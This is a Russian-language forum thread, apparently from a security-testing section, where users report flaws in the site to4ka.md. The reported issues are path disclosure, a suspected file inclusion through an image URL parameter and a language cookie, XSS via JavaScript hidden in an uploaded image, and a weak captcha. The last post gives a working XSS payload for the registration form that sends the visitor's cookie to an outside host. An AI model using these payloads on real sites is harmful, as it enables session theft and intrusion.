![]() |
www.to4ka.md
www.to4ka.md
|
http://to4ka.md/image.php/img_4970f7cf0bf60.jpg?width=127&height=72&croprati o=2:1.1&image=/images/original/img_4970f7cf0bf60.jpg'
пути можно раскрыть (это пока что), вообще на инклуд похоже |
Цитата:
|
Для ИЕ можно выполнить ХСС атаку загрузив яваскрипт код в картинку, вот пример
http://www.to4ka.md/images/original/img_49e81ca9d64ca.jpg |
Цитата:
Спасибо огромное всем кто тестит... |
Уязвима переменная name
Цитата:
|
UP
|
http://www.to4ka.md/
есть возможность выбора яз: "рус | rom" там делаетса через js (файл /js/js.js) через ф-цию redirectWithLang в куках (clang параметр) хранитса текущий яз. если изменить его (clang) на ,например, rux, тогда увидем пустую страничку возможно там инклуд) чтоб убрать ето: сделай дефолтный яз) |
На странице слабая капча. Одинаковые фон, позиция, длина, нет искажения. Можно написать декодер.
UPD: В форме регистрации пассивная XSS. Если ввести <img src=. onerror=document.location='http://www.google.com/search?q='+document.cookie>unexistant_login111 в логин и нажать "Проверить", перекинет на гугл с кукой. |
| Время: 05:44 |